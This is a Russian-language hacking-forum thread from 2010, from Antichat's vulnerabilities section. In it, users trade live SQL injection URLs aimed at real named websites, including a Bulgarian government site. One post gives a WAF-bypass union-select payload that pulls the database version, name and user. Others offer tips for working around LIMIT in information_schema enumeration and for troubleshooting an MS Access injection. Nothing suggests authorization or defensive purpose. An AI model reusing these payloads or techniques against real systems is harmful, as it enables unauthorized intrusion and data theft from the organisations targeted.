ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11611  
Старый 17.02.2010, 20:59
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1
 
Ответить с цитированием

  #11612  
Старый 17.02.2010, 22:09
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Цитата:
Сообщение от LokbatanLi  
a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1
WAF не дремлет...
Код:
http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
 
Ответить с цитированием

  #11613  
Старый 17.02.2010, 22:30
Аватар для [Feldmarschall]
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?

Последний раз редактировалось [Feldmarschall]; 17.02.2010 в 22:34..
 
Ответить с цитированием

  #11614  
Старый 17.02.2010, 23:18
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от [Feldmarschall]  
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
LIMIT можно:
Код:
WHERE field_name NOT IN (a, b, c ,d)
group_concat - хз...
 
Ответить с цитированием

  #11615  
Старый 17.02.2010, 23:31
Аватар для ~EviL~
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Пацаны, хелп, плиз )))
Код HTML:
http://www.site.com/script.asp?id=1'+or+1=@@version--
Выдает:
Код HTML:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=1' or 1=@@version--'. 

/script.asp, line 17
Что за нах**?
 
Ответить с цитированием

  #11616  
Старый 17.02.2010, 23:33
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Access не держит комментарии.
 
Ответить с цитированием

  #11617  
Старый 17.02.2010, 23:37
Аватар для ~EviL~
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Т.е. нифига не получится?
 
Ответить с цитированием

  #11618  
Старый 17.02.2010, 23:40
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Т.е екстрасенсы в отпуске
Я написал то, что вижу, исходя из того, что ты дал

Или иди статью читай, или линк давай
 
Ответить с цитированием

  #11619  
Старый 17.02.2010, 23:44
Аватар для ~EviL~
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Код HTML:
http://www.mlsp.government.bg/showimage.asp?id=1'+or+1=@@version--
Скромно, да? =))

P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.

Последний раз редактировалось ~EviL~; 17.02.2010 в 23:46..
 
Ответить с цитированием

  #11620  
Старый 18.02.2010, 01:56
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

это Microsoft Access а не MS SQL. Доступа к msysobjects как всегда нету. И в id=1' кавычка не нужна.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ